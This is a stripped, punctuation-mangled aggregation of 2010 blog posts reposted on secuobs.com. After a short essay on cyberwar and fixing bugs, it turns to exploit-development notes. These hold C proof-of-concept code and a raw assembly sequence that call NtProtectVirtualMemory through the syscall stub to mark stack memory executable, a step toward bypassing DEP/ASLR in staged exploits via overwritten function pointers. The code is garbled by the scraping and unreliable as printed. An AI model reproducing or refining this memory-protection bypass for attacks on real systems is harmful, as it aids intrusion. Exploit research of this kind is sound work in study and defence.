electronic components the paper is based on ironic considering the electronics were probably made there in the first place , or that in essence We are waiting for someone with a SCADA background to defect to adversary_x , I mean I know some of that data just from proximity of people working with it, nevermind if a well-financed adversary actually attempts to find out information-- besides they're already in your networks and I doubt the majority of necessary data is classified on siprnet not on niprnet A quote I liked that was fairly astute from the article was from the SecDev folks Once you start interpreting every move that a country makes as hostile, it builds paranoia into the system This is incredibly true, as evidenced by the cold war The key difference here however is that we're not talking about a nuclear holocaust there is no mutually assured destruction, or at least we haven't hammered out the details of how to make that model fit here assuming it even can That all said, to summarize my point ifdef INSECURITY undef INSECURITY define INSECURITY the vulnerabilities that exist in any given system electronic or otherwise , regardless of whether your adversary knows about them or not endif ifdef SECURITY undef SECURITY FIX YOUR BUGS, PERIOD LET OBSCURITY TAKE ITS NATURAL COURSE -- DONT DEPEND ON IT define SECURITY INSECURITY endif http://www.secuobs.com/revue/news/213060.shtmlhttp://www.secuobs.com/revue/news/213060.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - Okay, I got around my initial problem with making the stack executable-- thankfully the windows is nice enough to give me the address of the top of the stack, and at least per process thread the stack size is constant I was wrong about what I said about not being able to make the stack executable, not sure what I was doing wrong-- but I've got it working now It's still a work in progress, namely I need to figure out why the hell I can't pop in a static address to a PULONG of the stack size-- for some reason that errors out, and then of course I need to fix the oldPerm variable It's probably worth pointing out that calling NtProtectVirtualMemory is essentially the same as setting up the arguments myself and call'ing 0x7ffe0300, it was just easier for testing this way From memory, it just sets EAX to the right syscall number, copies 0x7ffe0300 to EDX, call's EDX, which in turn is just a stub that copies ESP to EDX and then So, IRL, after I get the last couple kinks out, you would need to control EAX and ESP and gain execution control via a pointer to a pointer ie a ret wont work, but like a vptr et cetera would Code below If you recompile this, your stack size may change in which case you would need to modify the sLen variable Otherwise, the binary pdb file I used can be found http rapidsharecom files 369369340 ASLR-round2ziphtml http rapidsharecom files 369369589 ASLR-round2ziphtml let me know if I need to re-upload it or similar -jf include include typedef DWORD WINAPI NTVPROT HANDLE, PVOID , PULONG, ULONG, PULONG PVOID getsp void _asm mov eax, esp int main int argc, char argv HMODULE hNtdll NULL NTVPROT ntVProt NULL DWORD sLen 0x0000A000 DWORD oldProt 0x666a PVOID espPtr NULL DWORD retval 0 If you're running this under a debugger uncomment this so you can attach to the process instead of starting it under a debugger some fixed addresses change when you start under a debugger for unsigned int i 0 i size_t -1 i Sleep 1000 hNtdll LoadLibraryA ntdlldll if NULL hNtdll fprintf stderr, pourcentss n , XX LoadLibraryA ntdll failed return EXIT_FAILURE ntVProt NTVPROT GetProcAddress hNtdll, NtProtectVirtualMemory if NULL ntVProt fprintf stderr, pourcentss n , XX ntVProt NULL return EXIT_FAILURE espPtr getsp espPtr BYTE espPtr 512 memcpy espPtr, xCC xCC xCC xC3 , 4 XXX Need to replace sLen and oldProt In this binary the value 0x0000A000 stack size for binary is found at 0x000631e6,0x000b033e,0x000b1144,0x000b1baa, 0x000bbdb8,0x000bf2fa,0x000c27d2,0x000c573f However using any of those values returns an error, which I'm not sure why im gonna need to debug the system call itself to figure out WTF is up oldProt should be easy, theres a section of memory at the end of the addresss space thats marked RW so we should be able to pop in any old address we want in there should Those addresses above should work expected output breakpoint, breakpoint, breakpoint, return 0 ntVProt HANDLE -1, PVOID 0x7ffdf008, sLen, PAGE_EXECUTE_READWRITE, _asm call espPtr return EXIT_SUCCESS http://www.secuobs.com/revue/news/213059.shtmlhttp://www.secuobs.com/revue/news/213059.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - Okay, got the arguments to the system call figured out however when I emulate the functionality of NtProtectVirtualMemory and do a push args push retaddr mov eax, syscallnum mov ecx, 0x7ffe0300 call dword ptr ecx It errors out telling me the protections I specified are invalid 0xC0000045 pretty sure it's just me misunderstanding something about how the argument stack is supposed to be setup, although it was my understanding that there should be 2x return addresses followed by the arguments So, now I really need to debug the kernel Which, I might add, is a fucking pain in the ass i m i s s s o f t i c e Once I unfuck whatever the problem is there I'm fairly positive it's something I'm doing wrong , then its just a matter of xfering control back to the stack A nice aspect of this is that if you are jumping to the syscall from like an overwritten function pointer, the call will put a valid return address onto the stack for you and the kernel will return back to the application-- meaning you could do staged exploits, or potentially use whatever context the application is in to finagle a jmp RWE-section-of-memory One interesting side note is that if you can do a push X push X jmp Y sequence, you can get the kernel to return to whenever you want, although it seems to be of limited use considering you needed a jmp in the first place I guess the bigger point is that the kernel returns to 0x7ffe0304 which is a to a ret, which is not going to be protected by a stack canary et cetera Anyways, slightly modified code PoC demonstrating where I'm at below It sets a few pages of memory at the bottom of the stack to be RWE I did this because I had problems finding a size of 0x0000A000 at a static address, there are a ton inside some of the nls stuff, but the system call fails when i use that section of memory, and it seems to get mapped to one of two places, meaning its address changes about 50pourcents of the time, making it mostly unsuitable anyways At any rate, IRL this is going to be variable as you'd like to have a section of memory youve written to be executable That said, it's a PoC, and this point is somewhat irrelevant as stack sizes change, so while this is generic and should work across the board, IRL you're probably going to want to find something closer to the actual full length of your threads stack size expected output is the same as last time, int 3, int 3, int 3, ret, return 0 include include typedef DWORD WINAPI NTVPROT HANDLE, PVOID , PULONG, ULONG, PULONG int main int argc, char argv HMODULE hNtdll NULL NTVPROT ntVProt NULL PVOID espPtr NULL If you're running this under a debugger add a while x y Sleep z loop so you can attach instead of starting under debugger memory layout changes when started under debugger hNtdll LoadLibraryA ntdlldll if NULL hNtdll fprintf stderr, pourcentss n , XX LoadLibraryA ntdll failed return EXIT_FAILURE ntVProt NTVPROT GetProcAddress hNtdll, NtProtectVirtualMemory if NULL ntVProt fprintf stderr, pourcentss n , XX ntVProt NULL return EXIT_FAILURE espPtr PULONG 0x7ffdf008 espPtr BYTE espPtr - 128 memcpy espPtr, xCC xCC xCC xC3 , 4 ntVProt HANDLE -1, PVOID 0x7ffdf008, PULONG 0x7ffdf010, 0x40, PAGE_EXECUTE_READWRITE PULONG 0x7ffdffcc _asm call espPtr return EXIT_SUCCESS http://www.secuobs.com/revue/news/213058.shtmlhttp://www.secuobs.com/revue/news/213058.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - Okay, so hah it helps if you push all of the arguments onto the stack for the function you're calling As soon as I noticed that it mysteriously started working There are some caveats, the TEB sometimes moves under a handful of conditions, first is if you start the process under a debugger, second is some conditions with multiple threads although the TEBs are still at mostly guessable addresses if you know what thread you are , et cetera When the TEB moves, it's still close by, and each thread will have its own, obviously But push 0x7ffdffcc out old perms push 0x00000040 in perms push 0x7ffdf010 in size push 0x7ffdf008 in addr push 0xffffffff in handle push 0x41414141 mov eax, 0xd7 NtProtectVirtualMemory mov edx, 0x7ffe0300 call dword ptr edx ret If you want to modify execution control on return from the system call, push another address up there and change the call dword ptr edx into a jmp http://www.secuobs.com/revue/news/213057.shtmlhttp://www.secuobs.com/revue/news/213057.shtml